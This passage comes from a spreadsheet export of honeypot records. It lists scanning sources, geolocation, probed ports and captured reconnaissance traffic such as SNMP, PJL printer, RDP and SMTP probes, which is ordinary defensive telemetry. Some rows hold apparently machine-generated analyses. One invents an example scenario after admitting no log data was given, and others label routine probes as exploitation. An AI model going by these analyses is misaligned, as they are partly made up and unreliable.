name=ns2.neoip.com ttl=718&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=718&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299412 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20485&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741956313'] ttl=685&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=685&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=685&gt;}&amp;&amp;{Data_DNS:&lt;SOA mname=ns1.neoip.com.sl rname=adam.neoip.com serial=2915299428 refresh=600 retry=900 expire=7200 minimum=3600 ttl=20617&gt;}&amp;&amp;{Data_DNS:&lt;TXT data=['Generation Time: 1741963509'] ttl=817&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns1.neoip.com ttl=817&gt;}&amp;&amp;{Data_DNS:&lt;NS name=ns2.neoip.com ttl=817&gt;}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8d62:a32"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-U"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No log data provided to analyze._x000a__x000a_However, if we were to imagine some typical honeypot log entries, here's an example analysis:_x000a__x000a_The IP 192.168.1.100 attempted to connect to the open SSH service on a server with the username &quot;admin&quot;. This could be a brute-force login attempt or a reconnaissance activity. The attacker may be trying to gain unauthorized access to sensitive data. &amp;&amp; Possible brute-force login attempt against SMTP service, as there is no activity detected but still a record of attempted access. No incoming or outgoing SMTP traffic was recorded. This may indicate someone trying to access the email server without being successful. &amp;&amp; Possible malicious activity detected, SMTP server received command &quot;RSET&quot; without any arguments or data, which may be an attempt to reset the SMTP connection for further malicious actions. This could be a reconnaissance phase by an attacker. It might also indicate an attempt to exploit a vulnerability in the SMTP service. &amp;&amp; This log indicates a possible attempt to reset the SMTP connection, potentially indicating an attacker trying to manipulate or disrupt legitimate email traffic by issuing unauthorized commands. The command RSET is typically used for resetting the mail transaction in a valid SMTP conversation. This may be part of a larger malicious activity to compromise the system's email services."/>
    <m/>
  </r>
  <r>
    <x v="298"/>
    <x v="298"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T02:10:28"/>
    <d v="2023-11-29T23:33:02"/>
    <d v="2025-04-30T02:10:28"/>
    <n v="258"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21379&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2d9:3bcd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="299"/>
    <x v="299"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:52:45"/>
    <d v="2025-04-30T01:32:56"/>
    <d v="2025-04-30T01:52:45"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:16fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="300"/>
    <x v="300"/>
    <s v="111-254-201-239.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-30T01:43:03"/>
    <d v="2025-04-30T01:43:03"/>
    <d v="2025-04-30T01:43:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="HINET"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="corporate"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:6ffe:c9ef"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="301"/>
    <x v="301"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:41:17"/>
    <d v="2024-04-11T09:54:00"/>
    <d v="2025-04-30T01:41:17"/>
    <n v="160"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_IMAP_H19&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_POSTGRES_H41&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_IRC_H22&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_MSSQL_H4&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_SIP_H41&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_POP3_H26&amp;&amp;SMA-LAB_FTP_H3"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;110&amp;&amp;5432&amp;&amp;143&amp;&amp;389&amp;&amp;1080&amp;&amp;3306&amp;&amp;47219&amp;&amp;161&amp;&amp;1521&amp;&amp;NA&amp;&amp;5900&amp;&amp;6667&amp;&amp;3389&amp;&amp;1433&amp;&amp;54729&amp;&amp;9100&amp;&amp;21&amp;&amp;80&amp;&amp;56086&amp;&amp;54953&amp;&amp;23&amp;&amp;443&amp;&amp;57155"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;request&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DigSkGCdR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nPOsNs'}}&amp;&amp;{Data_HTTPS:{'Host': 'vmi1321981.contaboserver.net', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c6eb:1812"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The data suggests an attempt to access PostgreSQL database services, potentially for unauthorized purposes such as password cracking or SQL injection attacks. This could be a reconnaissance scan or a malicious probe seeking vulnerabilities. It indicates possible attempts to exploit the database system. &amp;&amp; Unknown FTP activity detected, possibly an attempt to connect or scan for vulnerabilities._x000a_No specific FTP commands were issued during this interaction._x000a_This may indicate a reconnaissance or scanning operation by a malicious entity. &amp;&amp; Malicious printer exploitation attempt detected, where an attacker sent a command to retrieve printer information._x000a_The attacker is likely trying to gather sensitive information about the system's printing capabilities._x000a_This could be a reconnaissance step for further attacks. &amp;&amp; Possible malicious activity is a printer exploit attempt where an attacker is sending a command to retrieve information about the device. The command is likely used to gather sensitive information or potentially execute further malicious actions. This could be part of a larger print server or network vulnerability exploitation."/>
    <s v="Printer Hack &amp;&amp; PortScan"/>
  </r>
  <r>
    <x v="302"/>
    <x v="302"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:34:51"/>
    <d v="2024-04-15T09:14:48"/>
    <d v="2025-04-30T01:34:51"/>
    <n v="177"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:sip']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_HTTP_H24&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_MYSQL_H3&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_FTP_H17&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_RDP_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;1080&amp;&amp;3389&amp;&amp;54262&amp;&amp;110&amp;&amp;23&amp;&amp;32677&amp;&amp;21&amp;&amp;1521&amp;&amp;3306&amp;&amp;NA&amp;&amp;5900&amp;&amp;9100&amp;&amp;143&amp;&amp;6379&amp;&amp;1433&amp;&amp;5432&amp;&amp;80&amp;&amp;389&amp;&amp;6667"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}"/>
    <n v="61"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;query&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TSHdqyHEQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cmrwpi'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mMVGcI'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qelYpuUjH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MVTonm'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YdvGCMZxZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tOjJrU'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zToSBy'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_HTTP:{'Host': 'vmi1261124.contaboserver.net', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f05"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="303"/>
    <x v="303"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:30:10"/>
    <d v="2025-04-04T20:10:42"/>
    <d v="2025-04-30T01:30:10"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LV"/>
    <s v="Latvia"/>
    <s v="RIX"/>
    <s v="Riga"/>
    <s v="Rīga"/>
    <s v="Riga (Centra rajons)"/>
    <s v="456172"/>
    <s v="LV-1011"/>
    <s v="56.9514"/>
    <s v="24.1238"/>
    <s v="12578"/>
    <s v="SIA Tet"/>
    <s v="LATTELEKOM"/>
    <s v="business"/>
    <s v="Bridge Group"/>
    <s v="2001-10-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:50e8:fa13"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="304"/>
    <x v="304"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:12:56"/>
    <d v="2024-04-15T09:37:51"/>
    <d v="2025-04-30T01:12:56"/>
    <n v="85"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H47&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;16944"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="JAL"/>
    <s v="Jalisco"/>
    <s v="Tamazula de Gordiano Municipality"/>
    <s v="Callejones"/>
    <s v="8861137"/>
    <s v="NA"/>
    <s v="19.6683"/>
    <s v="-103.263"/>
    <s v="7438"/>
    <s v="Pegaso PCS, S.A. de C.V."/>
    <s v="Pegaso PCS, S.A. de C.V."/>
    <s v="business"/>
    <s v="Pegaso PCS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,16595)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,16265)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7319)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7336)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,14255)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19534)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,20225)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,20289)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,24001)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,12449)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,12577)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,17346)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7112)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7841)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,7969)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,18977)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19170)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19679)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,19685)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,4900)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,17102)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,6171)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,48833)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,49153)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,52833)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,2516)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,4371)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,4382)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,11863)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,15831)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,15837)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,18796)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,18805)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,3826)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,3837)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,3332)}&amp;&amp;{Data_SMB:User . authenticated 